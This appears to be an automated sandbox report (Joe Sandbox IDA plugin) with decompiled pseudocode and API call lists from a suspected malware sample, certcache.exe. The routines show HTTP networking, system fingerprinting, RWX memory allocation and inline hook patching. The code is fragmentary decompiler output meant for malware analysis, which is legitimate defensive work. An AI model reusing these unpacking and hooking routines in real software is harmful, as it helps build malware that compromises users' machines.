Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00138656, Relevance: 9.0, APIs: 6, Instructions: 20
network

C-Code - Quality: 45%

			E00138656(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
				void* _t10;
				void _t28;
				intOrPtr _t31;
				void* _t32;
				void* _t35;
				void* _t37;
				intOrPtr* _t40;
				void* _t42;
				void* _t44;

				_t40 = __edi;
				_t37 = __edx;
				_t32 = __ebx;
				_t10 = L00131D40(__ecx); // executed
				if(_t10 != 0) {
					goto 0x141674;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					if(L00131E80(_t10, __ecx, _t37) != 0) {
						goto 0x14168c;
						asm("int3");
						asm("int3");
						if(L00132560(_t37, _t40) != 0) {
							_t35 =  *(_t44 - 0x10);
							_t28 =  *_t35;
							 *_t32 = _t28;
							if(_t28 < 0x4000000) {
								_push(_t32);
								_t31 = L00138500(_t35 + 4,  *((intOrPtr*)(_t44 - 0xc)) - 4, _t40);
								_t35 =  *(_t44 - 0x10);
								 *_t40 = _t31;
							}
							HeapFree(GetProcessHeap(), 0, _t35);
						}
						HeapFree(GetProcessHeap(), ??, ??);
					}
					InternetCloseHandle( *(_t44 - 0x30));
				}
				InternetCloseHandle( *(_t44 - 0x34)); // executed
				InternetCloseHandle( *(_t44 - 0x38)); // executed
				HeapFree(GetProcessHeap(), 0, 0);
				HeapFree(GetProcessHeap(), 0, _t42);
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				return 0 |  *_t40 != 0x00000000;
			}

0x00138656
0x00138656
0x00138656
0x00138656
0x00138660
0x00138662
0x00138667
0x00138668
0x00138669
0x0013866a
0x0013866b
0x00138676
0x00138678
0x0013867d
0x0013867e
0x00138689
0x0013868b
0x0013868e
0x00138690
0x00138697
0x0013869f
0x001386a3
0x001386a8
0x001386ae
0x001386ae
0x001386ba
0x001386ba
0x001386cc
0x001386cc
0x001386d5
0x001386d5
0x001386de
0x001386e7
0x001386f8
0x00138708
0x0013871a
0x0013872c
0x0013873f

APIs

InternetCloseHandle.WININET(?), ref: 001386DE
InternetCloseHandle.WININET(?), ref: 001386E7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 001386F1
HeapFree.KERNEL32(00000000), ref: 001386F8
GetProcessHeap.KERNEL32(00000000,?), ref: 00138701
HeapFree.KERNEL32(00000000), ref: 00138708

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00139409, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62

APIs

GetProcessHeap.KERNEL32(00000000), ref: 0013944F
HeapFree.KERNEL32(00000000), ref: 00139456
SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,C:\Windows\SysWOW64), ref: 00139492
SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,C:\Windows\SysWOW64), ref: 001394A8

Strings

C:\Windows\SysWOW64, xrefs: 00139483

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0012201B, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 18string

APIs

lstrcmp.KERNEL32(face,book), ref: 0012203A

Strings

book, xrefs: 0012202D
face, xrefs: 00122032
just string, xrefs: 00122020

Memory Dump Source

Source File: 00000004.00000002.729839637.0000000000120000.00000040.sdmp, Offset: 00120000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_120000_certcache.jbxd

Function 00139F9D, Relevance: 6.0, APIs: 4, Instructions: 10

C-Code - Quality: 58%

			E00139F9D() {
				void* _t5;
				void* _t6;
				void* _t7;

				memset();
				HeapFree(GetProcessHeap(), 0, _t7); // executed
				L001315B0(_t5, _t6); // executed
				ExitProcess(0);
			}

0x00139f9d
0x00139fb0
0x00139fb6
0x00139fbd

APIs

memset.NTDLL ref: 00139F9D
GetProcessHeap.KERNEL32(00000000), ref: 00139FA9
HeapFree.KERNEL32(00000000), ref: 00139FB0
ExitProcess.KERNEL32 ref: 00139FBD

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00122663, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188

C-Code - Quality: 52%

			E00122663(intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v44;
				char _v76;
				intOrPtr _v80;
				DWORD* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				void* _v100;
				intOrPtr _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr* _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				intOrPtr _v172;
				int _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t100;
				intOrPtr _t107;
				intOrPtr _t108;
				int _t113;
				int _t131;
				void* _t135;
				intOrPtr _t157;
				intOrPtr _t159;
				char* _t160;
				intOrPtr _t161;
				void* _t164;
				intOrPtr _t183;
				unsigned int _t186;
				intOrPtr _t192;
				void* _t206;
				intOrPtr _t210;

				_t100 = _a4;
				_v44 = 0;
				_t135 =  *((intOrPtr*)(_t100 + 0x3c));
				_v184 = _t135;
				_v180 = _t100;
				_v80 = _t100;
				_v84 =  &_v44;
				_v88 =  *((intOrPtr*)(_t100 + 0x20));
				_v92 =  *((intOrPtr*)(_t100 + 0x40));
				_v96 = _t100 + 0x3c;
				_v100 = _t135;
				E001223F0(); // executed
				E0012188A(_v100);
				_t210 = _t206 - 8 + 8 - 4 + 4;
				_t164 = _v100;
				_t192 =  *((intOrPtr*)(_t164 + 0x3c));
				_v104 = _t164 + _t192;
				_v108 = _v100 + 0x3c;
				_v112 = 0x18;
				if(_t192 + 0xffffffc0 <= 0xfc0) {
					_t161 = _v104;
					_t134 =  ==  ? _t161 + 0x18 : 0x18;
					_v112 =  ==  ? _t161 + 0x18 : 0x18;
				}
				_v116 = _v112;
				if(_v92 == 0) {
					L4:
					_v140 =  *_v96;
					_v144 = 0;
					do {
						_t107 = _v144;
						 *((char*)(_v140 + _t107)) =  *((intOrPtr*)(_v100 + _t107));
						_t108 = _t107 + 1;
						_v144 = _t108;
					} while (_t108 != 0x400);
					_t110 =  ==  ? _v100 +  *_v108 : 0;
					 *((intOrPtr*)(( ==  ? _v100 +  *_v108 : 0) + 0x34)) =  *_v96;
					_t113 = VirtualProtect(_v100, 0x400, 2,  &_v44); // executed
					_t183 = _v80;
					_v40 =  *((intOrPtr*)(_t183 + 0x6c));
					_v36 =  *((intOrPtr*)(_t183 + 0x70));
					_v32 =  *((intOrPtr*)(_t183 + 0x74));
					_v28 =  *((intOrPtr*)(_t183 + 0x68));
					_v24 =  *((intOrPtr*)(_t183 + 0x64));
					_v20 = _v100 +  *((intOrPtr*)(_t183 + 0x44));
					 *((intOrPtr*)(_t210 - 0xc)) = _t183;
					_v184 = 0;
					_v180 = 0x78;
					_v148 = _t113;
					_v152 = 0;
					_v156 = 0x78;
					E0012104C();
					_t210 =  *((intOrPtr*)( &_v40 + 0x10));
					goto __eax;
				} else {
					_t160 =  &_v76;
					_t203 =  ==  ? _v104 : 0;
					_v120 = ( *(( ==  ? _v104 : 0) + 0x14) & 0x0000ffff) + _v116;
					_v124 = _t160;
					_v128 = _t160 + 0x10;
					_v132 = _t160;
					_v136 = 0;
					while(1) {
						_t157 = _v120;
						_t186 =  *(_t157 + 0x24);
						_v160 = _v136;
						_v164 = _t186 >> 0x0000001e & 0x00000001;
						_v168 = _t186 >> 0x1f;
						 *_v124 = 1;
						asm("movaps xmm0, [0x1240e0]");
						asm("movups [eax], xmm0");
						_v172 = _t157;
						_t131 = VirtualProtect(_v100 +  *((intOrPtr*)(_t157 + 0xc)),  *(_t157 + 8),  *( &_v76 + (_v164 << 4) + (_v168 << 3) + ((_t186 >> 0x0000001d & 0x00000001) << 2)),  &_v44); // executed
						_t159 = _v160 + 1;
						_v176 = _t131;
						_v120 = _v172 + 0x28;
						_v136 = _t159;
						if(_t159 == _v92) {
							goto L4;
						}
					}
					goto L4;
				}
			}

0x0012266f
0x00122675
0x00122687
0x0012268d
0x00122690
0x00122694
0x00122697
0x0012269a
0x0012269d
0x001226a0
0x001226a3
0x001226a6
0x001226b7
0x001226bc
0x001226ca
0x001226cd
0x001226db
0x001226de
0x001226e1
0x001226e4
0x001226eb
0x001226f9
0x001226fc
0x001226fc
0x00122708
0x0012270b
0x00122749
0x00122750
0x00122756
0x0012275c
0x0012275c
0x0012276e
0x00122771
0x00122779
0x00122779
0x0012279c
0x0012279f
0x001227b1
0x001227bd
0x001227c6
0x001227cc
0x001227d2
0x001227d8
0x001227de
0x001227e1
0x001227e7
0x001227ea
0x001227f2
0x001227fa
0x00122800
0x00122806
0x0012280c
0x00122822
0x00122828
0x0012270d
0x0012270f
0x0012271f
0x00122732
0x00122735
0x00122738
0x0012273b
0x0012273e
0x00122835
0x0012283b
0x0012284c
0x0012284f
0x0012285d
0x0012286e
0x00122877
0x0012287d
0x00122887
0x001228b0
0x001228b6
0x001228be
0x001228cf
0x001228d5
0x001228d8
0x001228de
0x00000000
0x00000000
0x001228e4
0x00000000
0x00122835

APIs

Part of subcall function 001223F0: VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 00122428

VirtualProtect.KERNELBASE(?,00000400,00000002,00000000), ref: 001227B1
VirtualProtect.KERNELBASE(?,?,?,00000000), ref: 001228B6

Strings

x, xrefs: 001227F2

Memory Dump Source

Source File: 00000004.00000002.729839637.0000000000120000.00000040.sdmp, Offset: 00120000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_120000_certcache.jbxd

Function 00139F42, Relevance: 4.5, APIs: 3, Instructions: 25

C-Code - Quality: 47%

			E00139F42() {
				void* _t6;
				void* _t11;
				void* _t12;
				void* _t18;
				void* _t19;
				void* _t20;

				L00131B10(E00131BE0(_t11, _t12, _t18, _t19), 0x1311f0, _t18, _t19);
				_push(0x13c0d0);
				_push(0x64df2dad);
				_push(0x48);
				_t15 = E00131BE0(_t11, 0x8f7ee672, _t18, _t19);
				L00131B10(_t3, 0x1310d0, _t18, _t19);
				_t6 = RtlAllocateHeap(GetProcessHeap(), 0, 0x8000000); // executed
				_t20 = _t6;
				if(_t20 == 0) {
					L3:
					ExitProcess(0);
				}
				goto 0x141d52;
				asm("int3");
				asm("int3");
				asm("int3");
				memset();
				HeapFree(GetProcessHeap(), 0, _t20); // executed
				L001315B0(_t11, _t15); // executed
				goto L3;
			}

0x00139f4e
0x00139f5b
0x00139f60
0x00139f65
0x00139f71
0x00139f73
0x00139f89
0x00139f8f
0x00139f93
0x00139fbb
0x00139fbd
0x00139fbd
0x00139f95
0x00139f9a
0x00139f9b
0x00139f9c
0x00139f9d
0x00139fb0
0x00139fb6
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,08000000), ref: 00139F82
RtlAllocateHeap.NTDLL(00000000), ref: 00139F89
ExitProcess.KERNEL32 ref: 00139FBD

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00139554, Relevance: 4.5, APIs: 3, Instructions: 20

APIs

CreateFileMappingW.KERNELBASE ref: 00139554
CloseHandle.KERNEL32 ref: 0013959C
GetComputerNameW.KERNEL32(?,?), ref: 001395B1
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00139601
RtlAllocateHeap.NTDLL(00000000), ref: 00139608
_snprintf.NTDLL ref: 00139642
GetProcessHeap.KERNEL32(00000000,00000010), ref: 0013964E
HeapFree.KERNEL32(00000000), ref: 00139655

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00131E20, Relevance: 4.5, APIs: 3, Instructions: 18
network

C-Code - Quality: 77%

			E00131E20(void* __edi, void* __esi) {
				int _t11;
				DWORD* _t18;
				void* _t20;

				L0:
				GetLastError();
				_t18 = __esi - 1;
				if(_t18 != 0) {
					goto L0;
				}
				 *(_t20 + 0x10) = 4;
				if(HttpQueryInfoW( *(__edi + 8), 0x20000013, __edi + 0x10, _t20 + 0x10, _t18) == 0) {
					_t11 = InternetCloseHandle( *(__edi + 8)); // executed
					goto 0x140378;
					asm("int3");
					asm("int3");
					asm("int3");
					return _t11;
				} else {
					do {
						GetLastError();
						_t18 = _t18 - 1;
					} while (_t18 != 0);
					return  &(_t18[0]);
				}
			}

0x00131e20
0x00131e20
0x00131e26
0x00131e27
0x00000000
0x00000000
0x00131e2d
0x00131e49
0x00131e66
0x00131e6c
0x00131e71
0x00131e72
0x00131e73
0x00131e74
0x00131e4b
0x00131e50
0x00131e50
0x00131e56
0x00131e56
0x00131e62
0x00131e62

APIs

GetLastError.KERNEL32 ref: 00131E20
HttpQueryInfoW.WININET(?,20000013,00000004,?), ref: 00131E41
InternetCloseHandle.WININET(?), ref: 00131E66

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00138BB5, Relevance: 4.5, APIs: 3, Instructions: 16
string

C-Code - Quality: 23%

			E00138BB5(WCHAR** __ebx, short __edi) {
				WCHAR* _t5;
				WCHAR* _t11;
				void* _t12;

				_t5 = RtlAllocateHeap(GetProcessHeap()); // executed
				_t11 = _t5;
				if(_t11 != 0) {
					_t2 =  &(_t11[2]); // 0x4
					_t5 = lstrcpyW(_t2,  *(_t12 + 8));
					_t11[0x106] = __edi;
					 *_t11 =  *__ebx;
					 *__ebx = _t11;
				}
				goto 0x141836;
				asm("int3");
				asm("int3");
				asm("int3");
				return;
				__ah = __ah + __cl;
			}

0x00138bbc
0x00138bc2
0x00138bc6
0x00138bcb
0x00138bcf
0x00138bd5
0x00138bdd
0x00138bdf
0x00138bdf
0x00138be2
0x00138be7
0x00138be8
0x00138be9
0x00138bea
0x00138bec

APIs

GetProcessHeap.KERNEL32 ref: 00138BB5
RtlAllocateHeap.NTDLL(00000000), ref: 00138BBC
lstrcpyW.KERNEL32(00000004,?), ref: 00138BCF

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00131CE2, Relevance: 4.5, APIs: 3, Instructions: 12network

APIs

InternetOpenW.WININET ref: 00131CE2
GetProcessHeap.KERNEL32(00000000), ref: 00131CED
HeapFree.KERNEL32(00000000), ref: 00131CF4

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00138DA0, Relevance: 3.0, APIs: 2, Instructions: 34

APIs

RtlGetVersion.NTDLL ref: 00138DAD
GetNativeSystemInfo.KERNEL32(?), ref: 00138DB7

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00131C60, Relevance: 3.0, APIs: 2, Instructions: 18

APIs

memset.NTDLL ref: 00131C70
ObtainUserAgentString.URLMON(?,?,?), ref: 00131C85

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00131D0F, Relevance: 3.0, APIs: 2, Instructions: 15network

APIs

InternetConnectW.WININET ref: 00131D0F
InternetCloseHandle.WININET ref: 00131D31

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 001327C6, Relevance: 3.0, APIs: 2, Instructions: 8

C-Code - Quality: 100%

			E001327C6(signed int __eax) {
				long _t3;
				void* _t5;
				void* _t6;

				_t3 = __eax *  *(_t6 + 0x10);
				_t5 = RtlAllocateHeap(GetProcessHeap(), 8, _t3); // executed
				return _t5;
			}

0x001327c6
0x001327d4
0x001327db

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 001327CD
RtlAllocateHeap.NTDLL(00000000), ref: 001327D4

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 001384C0, Relevance: 2.5, APIs: 2, Instructions: 20

C-Code - Quality: 86%

			E001384C0(void* __ebx, void* __esi, void* __eflags) {
				void* _t1;
				void* _t2;
				void* _t11;

				_t11 = __esi;
				_t1 = L001329E0(__esi, __ebx); // executed
				if(_t1 == 0) {
					_t2 = _t11;
					goto 0x1415b0;
					asm("int3");
					return _t2;
				} else {
					HeapFree(GetProcessHeap(), 0, _t11);
					return 0;
				}
			}

0x001384c0
0x001384c4
0x001384ce
0x001384e9
0x001384eb
0x001384f0
0x001384f1
0x001384d0
0x001384da
0x001384e8
0x001384e8

APIs

GetProcessHeap.KERNEL32(00000000), ref: 001384D3
HeapFree.KERNEL32(00000000), ref: 001384DA

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00139305, Relevance: 1.5, APIs: 1, Instructions: 23

C-Code - Quality: 18%

			E00139305(WCHAR* __ecx) {
				void* _t7;
				short* _t8;
				WCHAR* _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t13 = __ecx;
				if(GetWindowsDirectoryW(??, ??) == 0) {
					L8:
					E00139370(_t13, _t14, _t15, _t16); // executed
					_t7 = L001390B0(__eflags); // executed
					return _t7;
				} else {
					_t8 = _t17 - 0x208;
					if( *(_t17 - 0x208) != 0) {
						while( *_t8 != 0x5c) {
							_t8 = _t8 + 2;
							_t25 =  *_t8;
							if( *_t8 != 0) {
								continue;
							} else {
								E00139370(_t13, _t14, _t15, _t16);
								return L001390B0(_t25);
							}
							goto L9;
						}
						goto 0x141962;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("lahf");
						asm("int3");
						asm("int3");
						 *(_t8 + 2) = _t13;
						GetVolumeInformationW(_t17 - 0x208, _t13, ??, ??, ??, ??, ??, ??); // executed
					}
					goto L8;
				}
				L9:
			}

0x00139305
0x0013930d
0x0013935b
0x0013935b
0x00139360
0x00139368
0x0013930f
0x00139317
0x0013931d
0x00139320
0x00139326
0x00139329
0x0013932d
0x00000000
0x0013932f
0x0013932f
0x0013933c
0x0013933c
0x00000000
0x0013932d
0x0013933d
0x00139342
0x00139343
0x00139344
0x00139345
0x00139346
0x00139347
0x00139348
0x00139349
0x00139355
0x00139355
0x00000000
0x0013931d
0x00000000

APIs

GetWindowsDirectoryW.KERNEL32 ref: 00139305

Part of subcall function 00139370: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\certcache.exe,00000104), ref: 0013938C
Part of subcall function 00139370: OpenSCManagerW.SECHOST(00000000,00000000,00000006), ref: 00139398
Part of subcall function 00139370: CloseServiceHandle.SECHOST(00000000), ref: 001393AA
Part of subcall function 00139370: GetProcessHeap.KERNEL32(00000008,0000015C), ref: 001393C6
Part of subcall function 00139370: RtlAllocateHeap.NTDLL(00000000), ref: 001393CD
Part of subcall function 00139370: lstrlen.KERNEL32(?), ref: 001393F4

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00139346, Relevance: 1.5, APIs: 1, Instructions: 13

APIs

GetVolumeInformationW.KERNELBASE(?), ref: 00139355

Part of subcall function 00139370: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\certcache.exe,00000104), ref: 0013938C
Part of subcall function 00139370: OpenSCManagerW.SECHOST(00000000,00000000,00000006), ref: 00139398
Part of subcall function 00139370: CloseServiceHandle.SECHOST(00000000), ref: 001393AA
Part of subcall function 00139370: GetProcessHeap.KERNEL32(00000008,0000015C), ref: 001393C6
Part of subcall function 00139370: RtlAllocateHeap.NTDLL(00000000), ref: 001393CD
Part of subcall function 00139370: lstrlen.KERNEL32(?), ref: 001393F4

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 001223F0, Relevance: 1.4, APIs: 1, Instructions: 200

C-Code - Quality: 30%

			E001223F0(intOrPtr _a4, void* _a8) {
				char _v21;
				char _v26;
				char _v31;
				intOrPtr* _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				intOrPtr* _v48;
				void** _v52;
				char* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr* _v72;
				intOrPtr* _v76;
				intOrPtr* _v80;
				void** _v84;
				char* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				void* _t121;
				intOrPtr _t143;
				intOrPtr _t148;
				intOrPtr _t157;
				intOrPtr _t158;
				void* _t162;
				intOrPtr _t164;
				intOrPtr _t167;
				char* _t168;
				void** _t173;
				void* _t178;
				intOrPtr _t191;
				intOrPtr _t197;
				intOrPtr _t214;
				intOrPtr _t217;
				intOrPtr* _t223;
				void** _t232;
				char* _t234;
				void* _t243;
				intOrPtr* _t244;

				_v36 =  &_v21;
				_v40 = _a4;
				_v44 =  &_v31;
				_v48 =  &_v26;
				_t121 = VirtualAlloc(0, 0x10000, 0x1000, 0x40); // executed
				_t234 =  &_v21;
				_t168 =  &_v26;
				_v52 = _t121;
				_v56 =  &_v31;
				 *_v52 = 0;
				_v60 =  *((intOrPtr*)(_v40 + 0x3c));
				_v64 = 4;
				_v68 = _v40 + _v60;
				_t130 =  ==  ? _v68 : 0;
				_v72 = _v56 + 1;
				_v76 = _t168 + 1;
				_v80 = _t234 + 1;
				_v84 =  &(_v52[1]);
				_v88 = _t168;
				_v92 = _v40 -  *((intOrPtr*)(( ==  ? _v68 : 0) + 0x34));
				_v96 = _v64;
				_v100 = _t234;
				_v104 = 0xfffffffb - _v52;
				_v108 = 0;
				while(1) {
					_t191 = _v96;
					_v112 = _v108;
					_v116 = _t191;
					_t143 = _t191 + _v52;
					 *_v56 = 0xe8;
					 *_v72 = 0x122194 - _t143;
					_t173 = _v52;
					_v120 = _t143;
					 *((intOrPtr*)(_t173 + _v116)) =  *_v44;
					_t197 = _v116;
					 *((char*)(_t173 + _t197 + 4)) =  *((intOrPtr*)(_v44 + 4));
					_t148 =  *((intOrPtr*)(0x12305c + _v112 * 0xc + 4));
					_v124 = _t148;
					_t178 = _t148 + _v40;
					 *_v88 = 0xe9;
					_v128 = _v120 + 0xfffffffb - _t178;
					_v132 = _t197 + 5;
					 *_v76 = _v128;
					 *_v100 = 0xe9;
					 *_v80 = _v104 + 0xfffffffb - _v116 + _t178;
					_v136 =  *((intOrPtr*)(0x12305c + _v112 * 0xc + 8));
					_v140 =  *((intOrPtr*)(0x12305c + _v112 * 0xc));
					_v144 = _v52 + _v132;
					_v148 = 0;
					do {
						_t157 = _v148;
						 *((char*)(_v144 + _t157)) =  *((intOrPtr*)(_v140 + _t157));
						_t158 = _t157 + 1;
						_v148 = _t158;
					} while (_t158 != _v136);
					_t244 = _t243 - 0x14;
					 *_t244 = _v40;
					_v164 = _v92;
					_v160 = _v124;
					_v156 = _v136;
					_v152 = _v144;
					E001221AC();
					_t243 = _t244 + 0x14;
					_t162 = _v116 + _v136;
					_t223 = _v36;
					_t232 = _v84;
					 *((intOrPtr*)(_t232 + _t162)) =  *_t223;
					 *((char*)(_t232 + _t162 + 4)) =  *((intOrPtr*)(_t223 + 4));
					_t164 = _v40;
					_t214 = _v124;
					 *((intOrPtr*)(_t164 + _t214)) =  *_v48;
					 *((char*)(_t164 + _t214 + 4)) =  *((intOrPtr*)(_v48 + 4));
					_t167 = _v116 + 0xe + _v136;
					_t217 = _v112 + 1;
					_v96 = _t167;
					_v108 = _t217;
					if(_t217 != 0x160) {
						continue;
					}
					return _t167;
				}
			}

0x0012241c
0x0012241f
0x00122422
0x00122425
0x00122428
0x00122431
0x00122439
0x0012243c
0x00122442
0x00122448
0x00122454
0x0012245a
0x00122465
0x00122477
0x00122486
0x0012248e
0x0012249b
0x001224a4
0x001224aa
0x001224ad
0x001224b0
0x001224b3
0x001224b6
0x001224b9
0x001224c9
0x001224cc
0x001224e5
0x001224ea
0x001224f0
0x001224f5
0x001224fd
0x00122504
0x00122507
0x0012250d
0x00122516
0x00122519
0x0012252d
0x00122531
0x00122537
0x0012253c
0x00122547
0x0012254d
0x00122553
0x00122567
0x00122579
0x0012258d
0x00122593
0x00122599
0x0012259f
0x001225a5
0x001225a5
0x001225ba
0x001225bd
0x001225c8
0x001225c8
0x001225d0
0x001225d6
0x001225dc
0x001225e3
0x001225ed
0x001225f7
0x001225fb
0x00122600
0x0012260c
0x0012260e
0x00122613
0x00122616
0x0012261c
0x00122625
0x00122628
0x0012262b
0x00122634
0x00122644
0x00122649
0x00122652
0x00122655
0x00122658
0x00000000
0x0012265e
0x001224c8
0x001224c8

APIs

VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 00122428

Memory Dump Source

